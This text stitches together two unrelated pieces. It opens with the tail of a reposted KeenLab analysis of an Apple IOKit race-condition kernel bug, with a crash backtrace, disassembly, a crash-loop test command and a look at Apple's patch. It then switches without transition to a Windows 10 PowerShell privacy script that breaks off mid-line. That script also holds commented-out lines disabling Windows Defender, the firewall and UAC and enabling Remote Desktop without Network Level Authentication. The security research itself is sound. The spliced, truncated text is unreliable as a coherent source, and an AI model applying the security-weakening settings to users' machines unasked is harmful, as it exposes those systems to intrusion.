0xffffff7fa039d2a4 com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue22submit_command_buffersEPK29IOAccelCommandQueueSubmitArgs + 0x8e 0xffffff81276d3b80 : 0xffffff7fa039c92c com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue24s_submit_command_buffersEPS_PvP25IOExternalMethodArguments + 0xba 0xffffff81276d3bc0 : 0xffffff7fa03f6db5 com.apple.driver.AppleIntelHD5000Graphics : __ZN19IGAccelCommandQueue14externalMethodEjP25IOExternalMethodArgumentsP24IOExternalMethodDispatchP8OSObjectPv + 0x19 0xffffff81276d3be0 : 0xffffff801e4dfa07 mach_kernel : _is_io_connect_method + 0x1e7 0xffffff81276d3d20 : 0xffffff801df97eb0 mach_kernel : _iokit_server + 0x5bd0 0xffffff81276d3e30 : 0xffffff801dedf283 mach_kernel : _ipc_kobject_server + 0x103 0xffffff81276d3e60 : 0xffffff801dec28b8 mach_kernel : _ipc_kmsg_send + 0xb8 0xffffff81276d3ea0 : 0xffffff801ded2665 mach_kernel : _mach_msg_overwrite_trap + 0xc5 0xffffff81276d3f10 : 0xffffff801dfb8dca mach_kernel : _mach_call_munger64 + 0x19a 0xffffff81276d3fb0 : 0xffffff801dfecc86 mach_kernel : _hndl_mach_scall64 + 0x16 Kernel Extensions in backtrace: com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000->0xffffff7fa03dffff dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000 dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000 com.apple.driver.AppleIntelHD5000Graphics(10.1.4)[E5BC31AC-4714-3A57-9CDC-3FF346D811C5]@0xffffff7fa03ee000->0xffffff7fa047afff dependency: com.apple.iokit.IOSurface(108.2.1)[B5ADE17A-36A5-3231-B066-7242441F7638]@0xffffff7f9f0fb000 dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000 dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000 dependency: com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000 BSD process name corresponding to current thread: cmdqueue1 Boot args: keepsyms=1 -v Mac OS version: 15F34 Kernel version: Darwin Kernel Version 15.5.0: Tue Apr 19 18:36:36 PDT 2016; root:xnu-3248.50.21~8/RELEASE_X86_64 Kernel UUID: 7E7B0822-D2DE-3B39-A7A5-77B40A668BC6 Kernel slide: 0x000000001dc00000 Kernel text base: 0xffffff801de00000 __HIB text base: 0xffffff801dd00000 System model name: MacBookAir6,2 (Mac-7DF21CB3ED6977E5) Disassembling the RIP register __text:000000000002929E mov esi, [rbx-10h] ; unsigned int __text:00000000000292A1 mov edx, [rbx-0Ch] ; unsigned int __text:00000000000292A4 mov rcx, [rbx-8] ; unsigned __int64 __text:00000000000292A8 mov r8, [rbx] ; unsigned __int64 We can see at the crash address, rbx has already go out-of-bound, hits an adjacent unmapped area, lead to crash. Tested on 10.11.5 Macbook Airs, Macbook Pros with command line while true; do ./cmdqueue1 ; done Fix for these issues The sources for XNU in 10.11.2 haven’t been released, but let’s have a look at disassembled kernel. Originally, we have these lines when creating a descriptor: 3741 if (ool_input) 3742 inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size, 3743 kIODirectionOut, current_task()); Proved by dissembling unpatched kernel: mov rax, gs:8 mov rcx, [rax+308h] ; unsigned int mov edx, 2 ; unsigned __int64 mov rsi, [rbp+arg_8] ; unsigned __int64 call __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *) mov r15, rax While on the 10.11.2, the corresponding snippet in _is_io_connect_method changed to: mov rax, gs:8 mov rcx, [rax+318h] ; unsigned int mov edx, 20002h ; unsigned __int64 mov rsi, [rbp+arg_8] ; unsigned __int64 call __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *) mov r15, rax A new flag (0x20000) is introduced to IOMemoryDescriptor::withAddressRange. The flag is later checked in IOGeneralMemoryDescriptor::memoryReferenceCreate, as shown in a diaphora diff on IOMemoryDescriptor’s functions. if ( this->_task && !err && this->baseclass_0._flags & 0x20000 && !(optionsa & 4) ) //newly added source err = IOGeneralMemoryDescriptor::memoryReferenceCreate(this, optionsa | 4, &ref->mapRef); And is then checked at the beginning of this function prot = 1; cacheMode = (this->baseclass_0._flags & 0x70000000) >> 28; v4 = vmProtForCacheMode(cacheMode); prot |= v4; if ( cacheMode ) prot |= 2u; if ( 2 != (this->baseclass_0._flags & 3) ) prot |= 2u; if ( optionsa & 2 ) prot |= 2u; if ( optionsa & 4 ) prot |= 0x200000u; prot is used at in mach_make_memory_entry_64, describing the permission of this mapping. 0x200000 is actually MAP_MEM_VM_COPY 382 /* leave room for vm_prot bits */ 383 #define MAP_MEM_ONLY 0x010000 /* change processor caching */ 384 #define MAP_MEM_NAMED_CREATE 0x020000 /* create extant object */ 385 #define MAP_MEM_PURGABLE 0x040000 /* create a purgable VM object */ 386 #define MAP_MEM_NAMED_REUSE 0x080000 /* reuse provided entry if identical */ 387 #define MAP_MEM_USE_DATA_ADDR 0x100000 /* preserve address of data, rather than base of page */ 388 #define MAP_MEM_VM_COPY 0x200000 /* make a copy of a VM range */ 389 #define MAP_MEM_VM_SHARE 0x400000 /* extract a VM range for remap */ 390 #define MAP_MEM_4K_DATA_ADDR 0x800000 /* preserve 4K aligned address of data */ 391 Which means now descriptors passed in via IOKit has a memory entry of possibly COW, preventing userspace from modifying it in 10.12.2 and iOS 10.2. Rather than fixing driver issues one by one, Apple seems to have done a good job by patching the entry. Credits Credit also goes to Liang Chen of KeenLab for also contributing to this research. Also kudos to Apple security team for responding and fixing these issues. Sursa: http://keenlab.tencent.com/en/2017/01/09/Racing-for-everyone-descriptor-describes-TOCTOU-in-Apple-s-core/

"Reclaim Windows 10" turns off a bunch of unnecessary Windows 10 telemetery, removes bloatware, and privacy invasions. Review and tweak before running. Scripts for reversing are included and commented. Fork via https://github.com/Disassembler0(different defaults) ########## # Win10 Initial Setup Script # Author: Disassembler <disassembler@dasm.cz> # Version: 1.7, 2016-08-15 # dasm's script: https://github.com/Disassembler0/Win10-Initial-Setup-Script/ # THIS IS A PERSONALIZED VERSION # This script leaves more MS defaults on, including MS security features. # Tweaked based on personal preferences for @alirobe 2016-11-16 - v1.7.1 # NOTE: READ THIS SCRIPT CAREFULLY BEFORE RUNNING IT. ADJUST COMMENTS AS APPROPRIATE. # This script will reboot your machine when completed. # Setting up a new machine? See http://ninite.com (for devs, http://chocolatey.org) ########## # Ask for elevated permissions if required If (!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")) { Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs Exit } ########## # Privacy Settings ########## # Disable Telemetry # Disable Telemetry Write-Host "Disabling Telemetry..." Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0 Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0 Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0 # Enable Telemetry # Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 3 # Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 3 # Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 3 # Disable Wi-Fi Sense Write-Host "Disabling Wi-Fi Sense..." If (!(Test-Path "HKLM:\Software\Microsoft\PolicyManager\default\WiFi\AllowWiFiHotSpotReporting")) { New-Item -Path "HKLM:\Software\Microsoft\PolicyManager\default\WiFi\AllowWiFiHotSpotReporting" -Force | Out-Null } Set-ItemProperty -Path "HKLM:\Software\Microsoft\PolicyManager\default\WiFi\AllowWiFiHotSpotReporting" -Name "Value" -Type DWord -Value 0 Set-ItemProperty -Path "HKLM:\Software\Microsoft\PolicyManager\default\WiFi\AllowAutoConnectToWiFiSenseHotspots" -Name "Value" -Type DWord -Value 0 # Enable Wi-Fi Sense # Set-ItemProperty -Path "HKLM:\Software\Microsoft\PolicyManager\default\WiFi\AllowWiFiHotSpotReporting" -Name "Value" -Type DWord -Value 1 # Set-ItemProperty -Path "HKLM:\Software\Microsoft\PolicyManager\default\WiFi\AllowAutoConnectToWiFiSenseHotspots" -Name "Value" -Type DWord -Value 1 # Disable SmartScreen Filter # Write-Host "Disabling SmartScreen Filter..." # Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer" -Name "SmartScreenEnabled" -Type String -Value "Off" # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\AppHost" -Name "EnableWebContentEvaluation" -Type DWord -Value 0 # Enable SmartScreen Filter # Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer" -Name "SmartScreenEnabled" -Type String -Value "RequireAdmin" # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\AppHost" -Name "EnableWebContentEvaluation" # Disable Bing Search in Start Menu Write-Host "Disabling Bing Search in Start Menu..." Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Search" -Name "BingSearchEnabled" -Type DWord -Value 0 # Enable Bing Search in Start Menu # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Search" -Name "BingSearchEnabled" # Disable Start Menu suggestions Write-Host "Disabling Start Menu suggestions..." Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SystemPaneSuggestionsEnabled" -Type DWord -Value 0 # Enable Start Menu suggestions # Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SystemPaneSuggestionsEnabled" -Type DWord -Value 1 # Disable Location Tracking Write-Host "Disabling Location Tracking..." Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Overrides\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" -Name "SensorPermissionState" -Type DWord -Value 0 Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\lfsvc\Service\Configuration" -Name "Status" -Type DWord -Value 0 # Enable Location Tracking # Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Overrides\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" -Name "SensorPermissionState" -Type DWord -Value 1 # Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\lfsvc\Service\Configuration" -Name "Status" -Type DWord -Value 1 # Disable Feedback Write-Host "Disabling Feedback..." If (!(Test-Path "HKCU:\Software\Microsoft\Siuf\Rules")) { New-Item -Path "HKCU:\Software\Microsoft\Siuf\Rules" -Force | Out-Null } Set-ItemProperty -Path "HKCU:\Software\Microsoft\Siuf\Rules" -Name "NumberOfSIUFInPeriod" -Type DWord -Value 0 # Enable Feedback # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Siuf\Rules" -Name "NumberOfSIUFInPeriod" # Disable Advertising ID Write-Host "Disabling Advertising ID..." If (!(Test-Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo")) { New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo" | Out-Null } Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo" -Name "Enabled" -Type DWord -Value 0 # Enable Advertising ID # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo" -Name "Enabled" # Disable Cortana Write-Host "Disabling Cortana..." If (!(Test-Path "HKCU:\Software\Microsoft\Personalization\Settings")) { New-Item -Path "HKCU:\Software\Microsoft\Personalization\Settings" -Force | Out-Null } Set-ItemProperty -Path "HKCU:\Software\Microsoft\Personalization\Settings" -Name "AcceptedPrivacyPolicy" -Type DWord -Value 0 If (!(Test-Path "HKCU:\Software\Microsoft\InputPersonalization")) { New-Item -Path "HKCU:\Software\Microsoft\InputPersonalization" -Force | Out-Null } Set-ItemProperty -Path "HKCU:\Software\Microsoft\InputPersonalization" -Name "RestrictImplicitTextCollection" -Type DWord -Value 1 Set-ItemProperty -Path "HKCU:\Software\Microsoft\InputPersonalization" -Name "RestrictImplicitInkCollection" -Type DWord -Value 1 If (!(Test-Path "HKCU:\Software\Microsoft\InputPersonalization\TrainedDataStore")) { New-Item -Path "HKCU:\Software\Microsoft\InputPersonalization\TrainedDataStore" -Force | Out-Null } Set-ItemProperty -Path "HKCU:\Software\Microsoft\InputPersonalization\TrainedDataStore" -Name "HarvestContacts" -Type DWord -Value 0 # Enable Cortana # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Personalization\Settings" -Name "AcceptedPrivacyPolicy" # Set-ItemProperty -Path "HKCU:\Software\Microsoft\InputPersonalization" -Name "RestrictImplicitTextCollection" -Type DWord -Value 0 # Set-ItemProperty -Path "HKCU:\Software\Microsoft\InputPersonalization" -Name "RestrictImplicitInkCollection" -Type DWord -Value 0 # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\InputPersonalization\TrainedDataStore" -Name "HarvestContacts" # Restrict Windows Update P2P only to local network Write-Host "Restricting Windows Update P2P only to local network..." Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" -Name "DODownloadMode" -Type DWord -Value 1 If (!(Test-Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization")) { New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization" | Out-Null } Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization" -Name "SystemSettingsDownloadMode" -Type DWord -Value 3 # Unrestrict Windows Update P2P # Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" -Name "DODownloadMode" # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization" -Name "SystemSettingsDownloadMode" # Remove AutoLogger file and restrict directory Write-Host "Removing AutoLogger file and restricting directory..." $autoLoggerDir = "$env:PROGRAMDATA\Microsoft\Diagnosis\ETLLogs\AutoLogger" If (Test-Path "$autoLoggerDir\AutoLogger-Diagtrack-Listener.etl") { Remove-Item "$autoLoggerDir\AutoLogger-Diagtrack-Listener.etl" } icacls $autoLoggerDir /deny SYSTEM:`(OI`)`(CI`)F | Out-Null # Unrestrict AutoLogger directory # $autoLoggerDir = "$env:PROGRAMDATA\Microsoft\Diagnosis\ETLLogs\AutoLogger" # icacls $autoLoggerDir /grant:r SYSTEM:`(OI`)`(CI`)F | Out-Null # Stop and disable Diagnostics Tracking Service Write-Host "Stopping and disabling Diagnostics Tracking Service..." Stop-Service "DiagTrack" Set-Service "DiagTrack" -StartupType Disabled # Enable and start Diagnostics Tracking Service # Set-Service "DiagTrack" -StartupType Automatic # Start-Service "DiagTrack" # Stop and disable WAP Push Service Write-Host "Stopping and disabling WAP Push Service..." Stop-Service "dmwappushservice" Set-Service "dmwappushservice" -StartupType Disabled # Enable and start WAP Push Service # Set-Service "dmwappushservice" -StartupType Automatic # Start-Service "dmwappushservice" # Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\dmwappushservice" -Name "DelayedAutoStart" -Type DWord -Value 1 ########## # Service Tweaks ########## # Lower UAC level # Write-Host "Lowering UAC level..." # Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Type DWord -Value 0 # Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "PromptOnSecureDesktop" -Type DWord -Value 0 # Raise UAC level # Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Type DWord -Value 5 # Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "PromptOnSecureDesktop" -Type DWord -Value 1 # Enable sharing mapped drives between users # Write-Host "Enabling sharing mapped drives between users..." # Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLinkedConnections" -Type DWord -Value 1 # Disable sharing mapped drives between users # Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLinkedConnections" # Disable Firewall # Write-Host "Disabling Firewall..." # Set-NetFirewallProfile -Profile * -Enabled False # Enable Firewall # Set-NetFirewallProfile -Profile * -Enabled True # Disable Windows Defender # Write-Host "Disabling Windows Defender..." # Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Type DWord -Value 1 # Enable Windows Defender # Remove-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" # Disable Windows Update automatic restart Write-Host "Disabling Windows Update automatic restart..." Set-ItemProperty -Path "HKLM:\Software\Microsoft\WindowsUpdate\UX\Settings" -Name "UxOption" -Type DWord -Value 1 # Enable Windows Update automatic restart # Set-ItemProperty -Path "HKLM:\Software\Microsoft\WindowsUpdate\UX\Settings" -Name "UxOption" -Type DWord -Value 0 # Stop and disable Home Groups services Write-Host "Stopping and disabling Home Groups services..." Stop-Service "HomeGroupListener" Set-Service "HomeGroupListener" -StartupType Disabled Stop-Service "HomeGroupProvider" Set-Service "HomeGroupProvider" -StartupType Disabled # Enable and start Home Groups services # Set-Service "HomeGroupListener" -StartupType Manual # Set-Service "HomeGroupProvider" -StartupType Manual # Start-Service "HomeGroupProvider" # Disable Remote Assistance # Write-Host "Disabling Remote Assistance..." # Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Remote Assistance" -Name "fAllowToGetHelp" -Type DWord -Value 0 # Enable Remote Assistance # Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Remote Assistance" -Name "fAllowToGetHelp" -Type DWord -Value 1 # Enable Remote Desktop w/o Network Level Authentication # Write-Host "Enabling Remote Desktop w/o Network Level Authentication..." # Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Type DWord -Value 0 # Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Type DWord -Value 0 # Disable Remote Desktop # Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Type DWord -Value 1 # Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Type DWord -Value 1 ########## # UI Tweaks ########## # Disable Action Center # Write-Host "Disabling Action Center..." # If (!(Test-Path "HKCU:\Software\Policies\Microsoft\Windows\Explorer")) { # New-Item -Path "HKCU:\Software\Policies\Microsoft\Windows\Explorer" | Out-Null # } # Set-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\Explorer" -Name "DisableNotificationCenter" -Type DWord -Value 1 # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 0 # Enable Action Center # Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\Explorer" -Name "DisableNotificationCenter" # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" # Disable Lock screen Write-Host "Disabling Lock screen..." If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Personalization")) { New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Personalization" | Out-Null } Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Personalization" -Name "NoLockScreen" -Type DWord -Value 1 # Enable Lock screen # Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Personalization" -Name "NoLockScreen" # Disable Lock screen (Anniversary Update workaround) #If ([System.Environment]::OSVersion.Version.Build -gt 14392) { # Apply only for Redstone 1 or newer # $service = New-Object -com Schedule.Service # $service.Connect() # $task = $service.NewTask(0) # $task.Settings.DisallowStartIfOnBatteries = $false # $trigger = $task.Triggers.Create(9) # $trigger = $task.Triggers.Create(11) # $trigger.StateChange = 8 # $action = $task.Actions.Create(0) # $action.Path = "reg.exe" # $action.Arguments = "add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\SessionData /t REG_DWORD /v AllowLockScreen /d 0 /f" # $service.GetFolder("\").RegisterTaskDefinition("Disable LockScreen", $task, 6, "NT AUTHORITY\SYSTEM", $null, 4) | Out-Null #} # Enable Lock screen (Anniversary Update workaround) #If ([System.Environment]::OSVersion.Version.Build -gt 14392) { # Apply only for Redstone 1 or newer # Unregister-ScheduledTask -TaskName "Disable LockScreen" -Confirm:$false -ErrorAction SilentlyContinue #} # Disable Autoplay Write-Host "Disabling Autoplay..." Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers" -Name "DisableAutoplay" -Type DWord -Value 1 # Enable Autoplay # Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers" -Name "DisableAutoplay" -Type DWord -Value 0 # Disable Autorun for all drives Write-Host "Disabling Autorun for all drives..." If (!(Test-Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer")) { New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" | Out-Null } Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" -Name "NoDriveTypeAutoRun" -Type DWord -Value 255 # Enable Autorun # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" -Name "NoDriveTypeAutoRun" #Disable Sticky keys prompt Write-Host "Disabling Sticky keys prompt..." Set-ItemProperty -Path "HKCU:\Control Panel\Accessibility\StickyKeys" -Name "Flags" -Type String -Value "506" # Enable Sticky keys prompt # Set-ItemProperty -Path "HKCU:\Control Panel\Accessibility\StickyKeys" -Name "Flags" -Type String -Value "510" # Hide Search button / box Write-Host "Hiding Search Box / Button..." Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Search" -Name "SearchboxTaskbarMode" -Type DWord -Value 0 # Show Search button / box # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Search" -Name "SearchboxTaskbarMode" # Hide Task View button # Write-Host "Hiding Task View button..." # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "ShowTaskViewButton" -Type DWord -Value 0 # Show Task View button # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "ShowTaskViewButton" # Show small icons in taskbar # Write-Host "Showing small icons in taskbar..." # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "TaskbarSmallIcons" -Type DWord -Value 1 # Show large icons in taskbar # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "TaskbarSmallIcons" # Show titles in taskbar # Write-Host "Showing titles in taskbar..." # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "TaskbarGlomLevel" -Type DWord -Value 1 # Hide titles in taskbar # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "TaskbarGlomLevel" # Show all tray icons Write-Host "Showing all tray icons..." Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer" -Name "EnableAutoTray" -Type DWord -Value 0 # Hide tray icons as needed # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer" -Name "EnableAutoTray" # Show known file extensions Write-Host "Showing known file extensions..." Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "HideFileExt" -Type DWord -Value 0 # Hide known file extensions # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "HideFileExt" -Type DWord -Value 1 # Show hidden files Write-Host "Showing hidden files..." Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "Hidden" -Type DWord -Value 1 # Hide hidden files # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "Hidden" -Type DWord -Value 2 # Change default Explorer view to "Computer" Write-Host "Changing default Explorer view to `"Computer`"..." Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "LaunchTo" -Type DWord -Value 1 # Change default Explorer view to "Quick Access" # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "LaunchTo" # Show Computer shortcut on desktop # Write-Host "Showing Computer shortcut on desktop..." # If (!(Test-Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu")) { # New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu" | Out-Null # } # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu" -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Type DWord -Value 0 # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Type DWord -Value 0 # Hide Computer shortcut from desktop # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu" -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" # Remove Desktop icon from computer namespace # Write-Host "Removing Desktop icon from computer namespace..." # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}" -Recurse -ErrorAction SilentlyContinue # Add Desktop icon to computer namespace # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}" # Remove Documents icon from computer namespace # Write-Host "Removing Documents icon from computer namespace..." # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{d3162b92-9365-467a-956b-92703aca08af}" -Recurse -ErrorAction SilentlyContinue # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}" -Recurse -ErrorAction SilentlyContinue # Add Documents icon to computer namespace # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{d3162b92-9365-467a-956b-92703aca08af}" # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}" # Remove Downloads icon from computer namespace # Write-Host "Removing Downloads icon from computer namespace..." # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{088e3905-0323-4b02-9826-5d99428e115f}" -Recurse -ErrorAction SilentlyContinue # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{374DE290-123F-4565-9164-39C4925E467B}" -Recurse -ErrorAction SilentlyContinue # Add Downloads icon to computer namespace # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{088e3905-0323-4b02-9826-5d99428e115f}" # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{374DE290-123F-4565-9164-39C4925E467B}" # Remove Music icon from computer namespace # Write-Host "Removing Music icon from computer namespace..." # Remove-Item -Path 